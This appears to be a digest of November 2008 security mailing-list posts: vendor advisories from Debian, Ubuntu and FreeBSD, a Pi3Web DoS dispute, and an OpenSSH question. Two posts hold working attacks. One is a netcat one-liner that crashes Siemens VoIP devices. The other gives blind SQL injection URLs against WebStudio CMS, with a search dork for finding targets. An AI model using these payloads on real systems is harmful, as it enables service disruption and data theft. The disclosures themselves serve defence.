Re: Re: Wrong report: BID 32287, Pi3Web ISAPI DoS vulnerability

[zimpel]

Still wrong, No DoS. The server responds to further requests, after the dialog 
box appears:

192.168.1.5

 hz.t-online.de - [24/Nov/2008:22:17:51 +0100] "GET /isapi/users.txt HTTP/1.1" 
500 339

192.168.1.5 hz.t-online.de - [24/Nov/2008:22:17:51 +0100] "GET /favicon.ico 
HTTP/1.1" 200 973

192.168.1.5 hz.t-online.de - [24/Nov/2008:22:18:26 +0100] "GET / HTTP/1.1" 200 
2559

192.168.1.5 hz.t-online.de - [24/Nov/2008:22:18:26 +0100] "GET 
/icons/Pi3Web_earth3.gif HTTP/1.1" 200 3811

192.168.1.5 hz.t-online.de - [24/Nov/2008:22:18:26 +0100] "GET 
/icons/Pi3Web.ico HTTP/1.1" 200 973

192.168.1.5 hz.t-online.de - [24/Nov/2008:22:18:26 +0100] "GET 
/icons/red_ball.gif HTTP/1.1" 200 397

192.168.1.5 hz.t-online.de - [24/Nov/2008:22:18:26 +0100] "GET 
/icons/Pi3Tile.gif HTTP/1.1" 200 1866



Some explanation:

In desktop mode the application is interactive, but when installed as a system 
service it isn't.



Of course the preferred installation for a production server ist a system 
service. On the other hand, the (interactive) desktop application is the choice 
for web application development.



Finally the ISAPI example (!!!) files can be deleted or a simple filter in the 
server configuration can be used in order to hide these files:



1.) either extend the mapping directive:

Mapping Condition="&or(®exp('*.dll*',$U),®exp('*.dll',$f))" ISAPIMapper 
From="/isapi/" To="Isapi\"



or 2.) extend the ISAPI handler object:

CheckPath Condition="¬(&or(®exp('*.dll*',$U),®exp('*.dll',$f)))" 
StatusCode StatusCode="404"



Both filters for example URL http://hz/isapi/users.txt return a HTTP status 404.



This is simple configuration work as described in the server documentation. So 
what? I still cannot see any reason for a DoS vulnerability in this case.



Honestly, I don't believe that someone publishes the ISAPI (or CGI) examples 
delivered and installed with the server in an internet environment. The default 
configuration template for internet is internet.pi3 and this is of course 
without ISAPI mapping per default.



Finally there's still the fact, that wrong (server version) and incomplete 
(installation options, OS version) information has been posted without giving 
me the chance for analysis. I'm the only person in the Pi3Web project and I do 
this in my rare spare time (normally at the weekend).

--

regards,

Holger Zimmermann

Siemens C450IP/C475IP DoS

[Martin Kluge]

Hi,

echo -e "X sip:s X\nFrom:\nTo:\n" | nc -q0 -u  5060

Will disconnect all current VOIP and PSTN calls and reboot
the C450IP/C475IP devices.

Tested with current firmwares.

Vendor (Siemens) was contacted 11/2007, no fix supplied yet.

Have phun!

sky & Any

WebStudio CMS 'pageid' Blind SQL Injection

[glafkos]

Application:  WebStudio CMS

Vendor Name: BDigital Media Ltd

Vendors Url:  http://www.bdigital.biz

Bug Type: WebStudio CMS (pageid) Blind SQL Injection Vulnerability

Exploitation: Remote

Severity: Critical

Solution Status: Unpatched 

Introduction: WebStudio CMS is a modular Web Content Management System solution.

Google Dork:  "Powered by WebStudio"


Description:

WebStudio CMS is prone to an SQL-injection vulnerability because it fails to 
sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, 
access or modify data, or exploit latent vulnerabilities in the underlying 
database.

PoC:

http://localhost/index.php?pageid=1+and+1=1 ( TRUE  )

http://localhost/index.php?pageid=1+and+1=2 ( FALSE )

Exploit:
 
http://localhost/index.php?pageid=1+and+substring(@@version,1,1)=3 ( TRUE  )

http://localhost/index.php?pageid=1+and+substring(@@version,1,1)=4 ( FALSE )

http://localhost/index.php?pageid=1+and+substring(@@version,1,1)=5 ( FALSE )

Solution:

There was no vendor-supplied solution at the time of entry.

Edit source code manually to ensure user-supplied input is correctly sanitised.


Credits:

Charalambous Glafkos
Email:  glafkos (at) astalavista (dot) com
___
ASTALAVISTA - the hacking & security community
www.astalavista.com
www.astalavista.net

[SECURITY] [DSA 1671-1] New iceweasel packages fix several vulnerabilities

[Moritz Muehlenhoff]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- 
Debian Security Advisory DSA-1671-1  [EMAIL PROTECTED]
http://www.debian.org/security/   Moritz Muehlenhoff
November 24, 2008 http://www.debian.org/security/faq
- 

Package: iceweasel
Vulnerability  : several
Problem type   : remote
Debian-specific: no
CVE ID : CVE-2008-0017 CVE-2008-4582 CVE-2008-5012 CVE-2008-5013 
CVE-2008-5014 CVE-2008-5017 CVE-2008-5018 CVE-2008-5021 CVE-2008-5022 
CVE-2008-5023 CVE-2008-5024

Several remote vulnerabilities have been discovered in the Iceweasel
webbrowser, an unbranded version of the Firefox browser. The Common 
Vulnerabilities and Exposures project identifies the following problems:

CVE-2008-0017
   
   Justin Schuh discovered that a buffer overflow in the http-index-format
   parser could lead to arbitrary code execution.

CVE-2008-4582

   Liu Die Yu discovered an information leak through local shortcut
   files.

CVE-2008-5012

   Georgi Guninski, Michal Zalewski and Chris Evan discovered that
   the canvas element could be used to bypass same-origin
   restrictions.

CVE-2008-5013

   It was discovered that insufficient checks in the Flash plugin glue
   code could lead to arbitrary code execution.

CVE-2008-5014

   Jesse Ruderman discovered that a programming error in the
   window.__proto__.__proto__ object could lead to arbitrary code
   execution.

CVE-2008-5017

   It was discovered that crashes in the layout engine could lead to
   arbitrary code execution.

CVE-2008-5018

   It was discovered that crashes in the Javascript engine could lead to
   arbitrary code execution.

CVE-2008-5021

   It was discovered that a crash in the nsFrameManager might lead to
   the execution of arbitrary code.

CVE-2008-5022

   "moz_bug_r_a4" discovered that the same-origin check in
   nsXMLHttpRequest::NotifyEventListeners() could be bypassed.

CVE-2008-5023

   Collin Jackson discovered that the -moz-binding property bypasses
   security checks on codebase principals.

CVE-2008-5024

   Chris Evans discovered that quote characters were improperly
   escaped in the default namespace of E4X documents.

For the stable distribution (etch), these problems have been fixed in
version 2.0.0.18-0etch1.

For the upcoming stable distribution (lenny) and the unstable distribution
(sid), these problems have been fixed in version 3.0.4-1 of iceweasel 
and version 1.9.0.4-1 of xulrunner. Packages for arm and mips will be
provided soon.

We recommend that you upgrade your iceweasel package.

Upgrade instructions
- 

wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
will update the internal database
apt-get upgrade
will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 4.0 alias etch
- ---

Stable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, 
mipsel, powerpc, s390 and sparc.

Source archives:

  
http://security.debian.org/pool/updates/main/i/iceweasel/iceweasel_2.0.0.18-0etch1.diff.gz
Size/MD5 checksum:   186777 18d2492164c72b846fab74bd75a69e1b
  
http://security.debian.org/pool/updates/main/i/iceweasel/iceweasel_2.0.0.18.orig.tar.gz
Size/MD5 checksum: 47266681 ad1a208d95dedeafddbe7377de88d4d9
  
http://security.debian.org/pool/updates/main/i/iceweasel/iceweasel_2.0.0.18-0etch1.dsc
Size/MD5 checksum: 1289 84983c4e7f053c1f0eb3ea3d154bc6ad

Architecture independent packages:

  
http://security.debian.org/pool/updates/main/i/iceweasel/mozilla-firefox-gnome-support_2.0.0.18-0etch1_all.deb
Size/MD5 checksum:54478 73ed36d6990d6b86e8fccef00a9029b1
  
http://security.debian.org/pool/updates/main/i/iceweasel/firefox-dom-inspector_2.0.0.18-0etch1_all.deb
Size/MD5 checksum:54626 bcc4bd1443fe23e5311396949bac9f32
  
http://security.debian.org/pool/updates/main/i/iceweasel/firefox-gnome-support_2.0.0.18-0etch1_all.deb
Size/MD5 checksum:54596 62200645f81cd0e505fd40382333d010
  
http://security.debian.org/pool/updates/main/i/iceweasel/firefox_2.0.0.18-0etch1_all.deb
Size/MD5 checksum:54742 045a9714ca0a04061cee79bc16b4b940
  
http://security.debian.org/pool/updates/main/i/iceweasel/mozilla-firefox_2.0.0.18-0etch1_all.deb
Size/MD5 checksum:55274 09fdae147e16b09ad51544ab1fd218e6
  
http://security.debian.org/pool/updates/main/i/iceweasel/iceweasel-dom-inspector_2.0.0.18-0etch1_all.deb
Size/MD5 checksum:   239810 b1e8cab02ec9a70d89df8db4610b
  
http://security.debian.org/pool/updates/main/i/iceweasel/mozilla-firefox-dom-inspector_2.0.0.18

[SECURITY] [DSA 1670-1] New enscript packages fix arbitrary code execution

[Moritz Muehlenhoff]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- 
Debian Security Advisory DSA-1670-1  [EMAIL PROTECTED]
http://www.debian.org/security/   Moritz Muehlenhoff
November 24, 2008 http://www.debian.org/security/faq
- 

Package: enscript
Vulnerability  : buffer overflows
Problem type   : local(remote)
Debian-specific: no
CVE Id(s)  : CVE-2008-3863 CVE-2008-4306

Several vulnerabilities have been discovered in Enscript, a converter
from ASCII text to Postscript, HTML or RTF. The Common Vulnerabilities
and Exposures project identifies the following problems:

CVE-2008-3863

   Ulf Harnhammer discovered that a buffer overflow may lead to
   the execution of arbitrary code.

CVE-2008-4306

   Kees Cook and Tomas Hoger discovered that several buffer
   overflows may lead to the execution of arbitrary code.

For the stable distribution (etch), these problems have been fixed in
version 1.6.4-11.1.

For the upcoming stable distribution (lenny) and the unstable
distribution (sid), these problems have been fixed in version 1.6.4-13.

We recommend that you upgrade your enscript package.

Upgrade instructions
- 

wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
will update the internal database
apt-get upgrade
will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 4.0 alias etch
- ---

Stable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, 
mipsel, powerpc, s390 and sparc.

Source archives:

  
http://security.debian.org/pool/updates/main/e/enscript/enscript_1.6.4-11.1.diff.gz
Size/MD5 checksum:91162 87e85119b278fa214b29f84eda3944a4
  
http://security.debian.org/pool/updates/main/e/enscript/enscript_1.6.4.orig.tar.gz
Size/MD5 checksum:  1036734 b5174b59e4a050fb462af5dbf28ebba3
  
http://security.debian.org/pool/updates/main/e/enscript/enscript_1.6.4-11.1.dsc
Size/MD5 checksum:  631 b5e8009c5ef20c0bf2089e3c43881daf

alpha architecture (DEC Alpha)

  
http://security.debian.org/pool/updates/main/e/enscript/enscript_1.6.4-11.1_alpha.deb
Size/MD5 checksum:   538656 0de0747ee0addb4b63049fe3094075c0

amd64 architecture (AMD x86_64 (AMD64))

  
http://security.debian.org/pool/updates/main/e/enscript/enscript_1.6.4-11.1_amd64.deb
Size/MD5 checksum:   536032 76e2edd41d8d4a9ba6e452b8e1bd9843

arm architecture (ARM)

  
http://security.debian.org/pool/updates/main/e/enscript/enscript_1.6.4-11.1_arm.deb
Size/MD5 checksum:   521436 b3caa29eb9859b77b8856a25b33693a1

hppa architecture (HP PA RISC)

  
http://security.debian.org/pool/updates/main/e/enscript/enscript_1.6.4-11.1_hppa.deb
Size/MD5 checksum:   538552 01d9da109510c141db40f1136599c70f

i386 architecture (Intel ia32)

  
http://security.debian.org/pool/updates/main/e/enscript/enscript_1.6.4-11.1_i386.deb
Size/MD5 checksum:   487696 a2d60b314df3903c55d427f6c30aa0b4

ia64 architecture (Intel ia64)

  
http://security.debian.org/pool/updates/main/e/enscript/enscript_1.6.4-11.1_ia64.deb
Size/MD5 checksum:   549196 c072896a844917e6e60c086ed9ba71b2

mips architecture (MIPS (Big Endian))

  
http://security.debian.org/pool/updates/main/e/enscript/enscript_1.6.4-11.1_mips.deb
Size/MD5 checksum:   533542 bd6b349e56a67a4a41bd59caf9786d69

mipsel architecture (MIPS (Little Endian))

  
http://security.debian.org/pool/updates/main/e/enscript/enscript_1.6.4-11.1_mipsel.deb
Size/MD5 checksum:   501374 55ccfa56d3d38aabfdaad26fd2657a55

powerpc architecture (PowerPC)

  
http://security.debian.org/pool/updates/main/e/enscript/enscript_1.6.4-11.1_powerpc.deb
Size/MD5 checksum:   495706 c3b4cd868ec170ec4a54a0bf9d3a120c

s390 architecture (IBM S/390)

  
http://security.debian.org/pool/updates/main/e/enscript/enscript_1.6.4-11.1_s390.deb
Size/MD5 checksum:   494972 4463a8cba45134de9358e4b2895258a7

sparc architecture (Sun SPARC/UltraSPARC)

  
http://security.debian.org/pool/updates/main/e/enscript/enscript_1.6.4-11.1_sparc.deb
Size/MD5 checksum:   523362 edcacb33c1b597c5d5c61a40947c893b

  These files will probably be moved into the stable distribution on
  its next update.

- 
-
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security 
dists/stable/updates/main
Mailing list: [EMAIL PROTECTED]
Package info: `apt-cache show ' and http://packages.debian.org/
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.9 (GNU/Linux)

iEYEARECAAYFAkkrFdUACgkQ

[USN-674-2] HPLIP vulnerabilities

[Marc Deslauriers]

===
Ubuntu Security Notice USN-674-2  November 24, 2008
hplip vulnerabilities
CVE-2008-2940, CVE-2008-2941
===

A security issue affects the following Ubuntu releases:

Ubuntu 7.10

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 7.10:
  hplip   2.7.7.dfsg.1-0ubuntu5.2

In general, a standard system upgrade is sufficient to effect the
necessary changes.

Details follow:

USN-674-1 provided packages to fix vulnerabilities in HPLIP. Due to an
internal archive problem, the updates for Ubuntu 7.10 would not install
properly. This update provides fixed packages for Ubuntu 7.10.

We apologize for the inconvenience.

Original advisory details:

 It was discovered that the hpssd tool of hplip did not validate
 privileges in the alert-mailing function. A local attacker could
 exploit this to gain privileges and send e-mail messages from the
 account of the hplip user. This update alters hplip behaviour by
 preventing users from setting alerts and by moving alert configuration
 to a root-controlled /etc/hp/alerts.conf file. (CVE-2008-2940)
 
 It was discovered that the hpssd tool of hplip did not correctly
 handle certain commands. A local attacker could use a specially
 crafted packet to crash hpssd, leading to a denial of service.
 (CVE-2008-2941)


Updated packages for Ubuntu 7.10:

  Source archives:


http://security.ubuntu.com/ubuntu/pool/main/h/hplip/hplip_2.7.7.dfsg.1-0ubuntu5.2.diff.gz
  Size/MD5:   149554 6d12457a4229b6d002bbf454ce4c4479

http://security.ubuntu.com/ubuntu/pool/main/h/hplip/hplip_2.7.7.dfsg.1-0ubuntu5.2.dsc
  Size/MD5: 1064 d013f46bd4a1076ca4bd131c3b6dfcdd

http://security.ubuntu.com/ubuntu/pool/main/h/hplip/hplip_2.7.7.dfsg.1.orig.tar.gz
  Size/MD5: 14361049 ae5165d46413db8119979f5b3345f7a5

  Architecture independent packages:


http://security.ubuntu.com/ubuntu/pool/main/h/hplip/hplip-data_2.7.7.dfsg.1-0ubuntu5.2_all.deb
  Size/MD5:  6897802 4ba89cf27c4bd07221f4cf1005d406f0

http://security.ubuntu.com/ubuntu/pool/main/h/hplip/hplip-doc_2.7.7.dfsg.1-0ubuntu5.2_all.deb
  Size/MD5:  4146742 e8dc40c3159dee1a97322811003e030c

http://security.ubuntu.com/ubuntu/pool/main/h/hplip/hplip-gui_2.7.7.dfsg.1-0ubuntu5.2_all.deb
  Size/MD5:   117516 0ee5f6a832179e244e06e42d67e6b104

http://security.ubuntu.com/ubuntu/pool/universe/h/hplip/hpijs-ppds_2.7.7+2.7.7.dfsg.1-0ubuntu5.2_all.deb
  Size/MD5:   479914 dc684661485f3bb17b23f244e065

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):


http://security.ubuntu.com/ubuntu/pool/main/h/hplip/hpijs_2.7.7+2.7.7.dfsg.1-0ubuntu5.2_amd64.deb
  Size/MD5:   341462 80a265e7d17338267b3feff153146444

http://security.ubuntu.com/ubuntu/pool/main/h/hplip/hplip-dbg_2.7.7.dfsg.1-0ubuntu5.2_amd64.deb
  Size/MD5:   769972 712dad65b22a926810c3a8388af52371

http://security.ubuntu.com/ubuntu/pool/main/h/hplip/hplip_2.7.7.dfsg.1-0ubuntu5.2_amd64.deb
  Size/MD5:   302956 43eb75455ec39ec0c785003b937d3459

  i386 architecture (x86 compatible Intel/AMD):


http://security.ubuntu.com/ubuntu/pool/main/h/hplip/hpijs_2.7.7+2.7.7.dfsg.1-0ubuntu5.2_i386.deb
  Size/MD5:   334572 592adfe9165494b41fbdbb62f73fb404

http://security.ubuntu.com/ubuntu/pool/main/h/hplip/hplip-dbg_2.7.7.dfsg.1-0ubuntu5.2_i386.deb
  Size/MD5:   747180 19dca187611ca2127d429ca3b64123b8

http://security.ubuntu.com/ubuntu/pool/main/h/hplip/hplip_2.7.7.dfsg.1-0ubuntu5.2_i386.deb
  Size/MD5:   290338 d8103797df2cad750c5e5c7fae9db381

  lpia architecture (Low Power Intel Architecture):


http://ports.ubuntu.com/pool/main/h/hplip/hpijs_2.7.7+2.7.7.dfsg.1-0ubuntu5.2_lpia.deb
  Size/MD5:   337692 8a49f0e3e5a9a89c6f49433bda5755e0

http://ports.ubuntu.com/pool/main/h/hplip/hplip-dbg_2.7.7.dfsg.1-0ubuntu5.2_lpia.deb
  Size/MD5:   925962 1c080bc69bedda6bd6458e379b6d3b30

http://ports.ubuntu.com/pool/main/h/hplip/hplip_2.7.7.dfsg.1-0ubuntu5.2_lpia.deb
  Size/MD5:   290178 a8348d5941be54a2d3893929d1bc177b

  powerpc architecture (Apple Macintosh G3/G4/G5):


http://security.ubuntu.com/ubuntu/pool/main/h/hplip/hpijs_2.7.7+2.7.7.dfsg.1-0ubuntu5.2_powerpc.deb
  Size/MD5:   348146 83a03c118807e46998288302d2d965d3

http://security.ubuntu.com/ubuntu/pool/main/h/hplip/hplip-dbg_2.7.7.dfsg.1-0ubuntu5.2_powerpc.deb
  Size/MD5:   784404 6270645190e1107f379565735f7c7da4

http://security.ubuntu.com/ubuntu/pool/main/h/hplip/hplip_2.7.7.dfsg.1-0ubuntu5.2_powerpc.deb
  Size/MD5:   319076 952865096e5ef1770024e2c8f66167f6

  sparc architecture (Sun SPARC/UltraSPARC):


http://security.ubuntu.com/ubuntu/pool/main/h/hplip/hpijs_2.7.7+2.7.7.dfsg.1-0ubuntu5.2_sparc.deb
  Size/MD5:   332600 3f08413ca8e

[USN-675-2] Gaim vulnerability

[Marc Deslauriers]

===
Ubuntu Security Notice USN-675-2  November 24, 2008
gaim vulnerability
CVE-2008-2927
===

A security issue affects the following Ubuntu releases:

Ubuntu 6.06 LTS

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 6.06 LTS:
  gaim1:1.5.0+1.5.1cvs20051015-1ubuntu10.1

After a standard system upgrade you need to restart Gaim to effect
the necessary changes.

Details follow:

It was discovered that Gaim did not properly handle certain malformed
messages in the MSN protocol handler. A remote attacker could send a specially
crafted message and possibly execute arbitrary code with user privileges.
(CVE-2008-2927)


Updated packages for Ubuntu 6.06 LTS:

  Source archives:


http://security.ubuntu.com/ubuntu/pool/main/g/gaim/gaim_1.5.0+1.5.1cvs20051015-1ubuntu10.1.diff.gz
  Size/MD5:34051 dde2b4483bc14d671228c8a512c9fd0c

http://security.ubuntu.com/ubuntu/pool/main/g/gaim/gaim_1.5.0+1.5.1cvs20051015-1ubuntu10.1.dsc
  Size/MD5: 1061 0293c5a43587d3db41a2437da5254206

http://security.ubuntu.com/ubuntu/pool/main/g/gaim/gaim_1.5.0+1.5.1cvs20051015.orig.tar.gz
  Size/MD5:  4299145 949ae755e9be1af68eef6c09c36a7530

  Architecture independent packages:


http://security.ubuntu.com/ubuntu/pool/main/g/gaim/gaim-data_1.5.0+1.5.1cvs20051015-1ubuntu10.1_all.deb
  Size/MD5:   613282 4b5fd4fd6053473bf10db0634e993af0

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):


http://security.ubuntu.com/ubuntu/pool/main/g/gaim/gaim-dev_1.5.0+1.5.1cvs20051015-1ubuntu10.1_amd64.deb
  Size/MD5:   103266 05b0562cf37fb5c72063566134aa7369

http://security.ubuntu.com/ubuntu/pool/main/g/gaim/gaim_1.5.0+1.5.1cvs20051015-1ubuntu10.1_amd64.deb
  Size/MD5:   954258 7da66022c5ea3372d097f3f7404610f2

  i386 architecture (x86 compatible Intel/AMD):


http://security.ubuntu.com/ubuntu/pool/main/g/gaim/gaim-dev_1.5.0+1.5.1cvs20051015-1ubuntu10.1_i386.deb
  Size/MD5:   103248 81eebc45938e22bae57d3278682eee4b

http://security.ubuntu.com/ubuntu/pool/main/g/gaim/gaim_1.5.0+1.5.1cvs20051015-1ubuntu10.1_i386.deb
  Size/MD5:   836378 82ecc0d267bb90f7669786ea2092cb93

  powerpc architecture (Apple Macintosh G3/G4/G5):


http://security.ubuntu.com/ubuntu/pool/main/g/gaim/gaim-dev_1.5.0+1.5.1cvs20051015-1ubuntu10.1_powerpc.deb
  Size/MD5:   103256 0fba1bcef36f3b6369effaf634c1a1df

http://security.ubuntu.com/ubuntu/pool/main/g/gaim/gaim_1.5.0+1.5.1cvs20051015-1ubuntu10.1_powerpc.deb
  Size/MD5:   924628 5f2721e0fcbaf536e4bcbd7a74a6b06e

  sparc architecture (Sun SPARC/UltraSPARC):


http://security.ubuntu.com/ubuntu/pool/main/g/gaim/gaim-dev_1.5.0+1.5.1cvs20051015-1ubuntu10.1_sparc.deb
  Size/MD5:   103250 e43bfb56d37e3617b7bee0644c3948a8

http://security.ubuntu.com/ubuntu/pool/main/g/gaim/gaim_1.5.0+1.5.1cvs20051015-1ubuntu10.1_sparc.deb
  Size/MD5:   856760 66a004eff69e42183c6c58d732761b86




signature.asc
Description: This is a digitally signed message part

[USN-676-1] WebKit vulnerability

[Marc Deslauriers]

===
Ubuntu Security Notice USN-676-1  November 24, 2008
webkit vulnerability
CVE-2008-3632
===

A security issue affects the following Ubuntu releases:

Ubuntu 8.10

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 8.10:
  libwebkit-1.0-1 1.0.1-2ubuntu0.1

After a standard system upgrade you need to restart any applications that
use WebKit, such as Epiphany-webkit and Midori, to effect the necessary
changes.

Details follow:

It was discovered that WebKit did not properly handle Cascading Style Sheets
(CSS) import statements. If a user were tricked into opening a malicious
website, an attacker could cause a browser crash and possibly execute
arbitrary code with user privileges.


Updated packages for Ubuntu 8.10:

  Source archives:


http://security.ubuntu.com/ubuntu/pool/main/w/webkit/webkit_1.0.1-2ubuntu0.1.diff.gz
  Size/MD5:21219 e7f04089c687141f512cb5066d1a1c30

http://security.ubuntu.com/ubuntu/pool/main/w/webkit/webkit_1.0.1-2ubuntu0.1.dsc
  Size/MD5: 1538 23427df68878b3540e082d778cf74ed2

http://security.ubuntu.com/ubuntu/pool/main/w/webkit/webkit_1.0.1.orig.tar.gz
  Size/MD5: 13418752 4de68a5773998bea14e8939aa341c466

  Architecture independent packages:


http://security.ubuntu.com/ubuntu/pool/main/w/webkit/libwebkit-dev_1.0.1-2ubuntu0.1_all.deb
  Size/MD5:33888 3d3e394977eb1a52a81694786831075b

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):


http://security.ubuntu.com/ubuntu/pool/main/w/webkit/libwebkit-1.0-1-dbg_1.0.1-2ubuntu0.1_amd64.deb
  Size/MD5: 62588488 b87a1a306e88f330a034de2374f08998

http://security.ubuntu.com/ubuntu/pool/main/w/webkit/libwebkit-1.0-1_1.0.1-2ubuntu0.1_amd64.deb
  Size/MD5:  3498192 08f5383449a42b900a7a541a50f309d7

  i386 architecture (x86 compatible Intel/AMD):


http://security.ubuntu.com/ubuntu/pool/main/w/webkit/libwebkit-1.0-1-dbg_1.0.1-2ubuntu0.1_i386.deb
  Size/MD5: 62196494 3b3c6e6c871e45ebda20daeb377c261b

http://security.ubuntu.com/ubuntu/pool/main/w/webkit/libwebkit-1.0-1_1.0.1-2ubuntu0.1_i386.deb
  Size/MD5:  3012354 f1528e6e6dedd94de7cf80bc8cf00c83

  lpia architecture (Low Power Intel Architecture):


http://ports.ubuntu.com/pool/main/w/webkit/libwebkit-1.0-1-dbg_1.0.1-2ubuntu0.1_lpia.deb
  Size/MD5: 62283008 74002deca41e5eb530475b1b8162948c

http://ports.ubuntu.com/pool/main/w/webkit/libwebkit-1.0-1_1.0.1-2ubuntu0.1_lpia.deb
  Size/MD5:  2965064 a7e3b539e899ad5b1fae915f9da5fce2

  powerpc architecture (Apple Macintosh G3/G4/G5):


http://ports.ubuntu.com/pool/main/w/webkit/libwebkit-1.0-1-dbg_1.0.1-2ubuntu0.1_powerpc.deb
  Size/MD5: 64792472 dcaf2d61a355ef62a6bdc423aa68bbe2

http://ports.ubuntu.com/pool/main/w/webkit/libwebkit-1.0-1_1.0.1-2ubuntu0.1_powerpc.deb
  Size/MD5:  3291430 50b79b1e9dfd831cd4fb3ffeb6342ec8

  sparc architecture (Sun SPARC/UltraSPARC):


http://ports.ubuntu.com/pool/main/w/webkit/libwebkit-1.0-1-dbg_1.0.1-2ubuntu0.1_sparc.deb
  Size/MD5: 63702930 9a411dc78d88cdeadf1e105eafa84b31

http://ports.ubuntu.com/pool/main/w/webkit/libwebkit-1.0-1_1.0.1-2ubuntu0.1_sparc.deb
  Size/MD5:  3495810 b945ea2113760479bdc8be11aafe0272




signature.asc
Description: This is a digitally signed message part

Re: OpenSSH security advisory: cbc.adv

[Nick Boyce]

[ahem] ... Sorry to be dumb, but ...

On Fri, Nov 21, 2008 at 10:19 AM, Damien Miller <[EMAIL PROTECTED]> wrote:

> Based on the description contained in the CPNI report and a slightly
> more detailed description forwarded by CERT this issue appears to be
> substantially similar to a known weakness in the SSH binary packet
> protocol first described in 2002 by Bellare, Kohno and Namprempre[2].
> The new component seems to be an attack that can recover 14 bits of
> plaintext with a success probability of 2^-14

Could someone please help the uncomprehending [i.e. me :-)] understand
why or whether this is anything to be worried about at all ?

Quick calculator session :
2^(-18) = 0.03814697265625
2^(-14) = 0.6103515625

So there is a vanishingly small probability that a Bad Guy may
discover less than 2 characters from my command-line, every time they
try this attack.  And each time they fail, my connection gets rudely
chopped.  Two characters won't help them much.  They'd need to succeed
about ten times per typed command-line to snoop on most of my
sessions.  This weakness is surely of no conceivable use to a Bad Guy
?

What am I missing ?
Is this something to do with subsequently using those characters in a
known plaintext attack, or recovering a significant fraction of a
shortish typed password, or what ?

> The usage pattern where the attack is most likely to succeed is where an
> automated connection is configured to retry indefinitely in the event of
> errors. In this case, it might be possible to recover as much as 14 bits
> of plaintext per hour (assuming a very fast 10 connections per second).
> Implementing a limit on the number of connection retries (e.g. 256) is
> sufficient to render the attack infeasible for this case.

Given the amount of data pumped down the typical automated connection
per hour, this is hardly anything to worry about .. surely ?

Cheers
Nick Boyce
-- 
"We make money the old-fashioned way: we EARN it"

FreeBSD Security Advisory FreeBSD-SA-08:11.arc4random

[FreeBSD Security Advisories]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

=
FreeBSD-SA-08.11.arc4random Security Advisory
  The FreeBSD Project

Topic:  arc4random(9) predictable sequence vulnerability

Category:   core
Module: sys
Announced:  2008-11-24
Credits:Robert Woolley, Mark Murray, Maxim Dounin, Ruslan Ermilov
Affects:All supported versions of FreeBSD.
Corrected:  2008-11-24 17:39:39 UTC (RELENG_7, 7.1-PRERELEASE)
2008-11-24 17:39:39 UTC (RELENG_7_0, 7.0-RELEASE-p6)
2008-11-24 17:39:39 UTC (RELENG_6, 6.4-STABLE)
2008-11-24 17:39:39 UTC (RELENG_6_4, 6.4-RELEASE)
2008-11-24 17:39:39 UTC (RELENG_6_3, 6.3-RELEASE-p6)
CVE Name:   CVE-2008-5162

For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
following sections, please visit http://security.FreeBSD.org/>.

I.   Background

arc4random(9) is a generic-purpose random number generator based on the
key stream generator of the RC4 cipher.  It is expected to be
cryptographically strong, and used throughout the FreeBSD kernel for a
variety of purposes, some of which rely on its cryptographic strength.
arc4random(9) is periodically reseeded with entropy from the FreeBSD
kernel's Yarrow random number generator, which gathers entropy from a
variety of sources including hardware interrupts.  During the boot
process, additional entropy is provided to the Yarrow random number
generator from userland, helping to ensure that adequate entropy is
present for cryptographic purposes.

II.  Problem Description
 
When the arc4random(9) random number generator is initialized, there may
be inadequate entropy to meet the needs of kernel systems which rely on
arc4random(9); and it may take up to 5 minutes before arc4random(9) is
reseeded with secure entropy from the Yarrow random number generator.

III. Impact

All security-related kernel subsystems that rely on a quality random
number generator are subject to a wide range of possible attacks for the
300 seconds after boot or until 64k of random data is consumed.  The list
includes:

* GEOM ELI providers with onetime keys.  When a provider is configured in
  a way so that it gets attached at the same time during boot (e.g. it
  uses the rc subsystem to initialize) it might be possible for an
  attacker to recover the encrypted data.

* GEOM shsec providers.  The GEOM shsec subsytem is used to split a shared
  secret between two providers so that it can be recovered when both of
  them are present.  This is done by writing the random sequence to one
  of providers while appending the result of the random sequence on the
  other host to the original data.  If the provider was created within the
  first 300 seconds after booting, it might be possible for an attacker
  to extract the original data with access to only one of the two providers
  between which the secret data is split.

* System processes started early after boot may receive predictable IDs.

* The 802.11 network stack uses arc4random(9) to generate initial vectors
  (IV) for WEP encryption when operating in client mode and WEP
  authentication challenges when operating in hostap mode, which may be
  insecure.

* The IPv4, IPv6 and TCP/UDP protocol implementations rely on a quality
  random number generator to produce unpredictable IP packet identifiers,
  initial TCP sequence numbers and outgoing port numbers.  During the
  first 300 seconds after booting, it may be easier for an attacker to
  execute IP session hijacking, OS fingerprinting, idle scanning, or in
  some cases DNS cache poisoning and blind TCP data injection attacks.

* The kernel RPC code uses arc4random(9) to retrieve transaction
  identifiers, which might make RPC clients vulnerable to hijacking
  attacks.

IV.  Workaround

No workaround is available for affected systems.

V.   Solution

NOTE WELL: Any GEOM shsec providers which were created or written to
during the first 300 seconds after booting should be re-created after
applying this security update.

Perform one of the following:

1) Upgrade your vulnerable system to 6-STABLE, or 7-STABLE, or to the
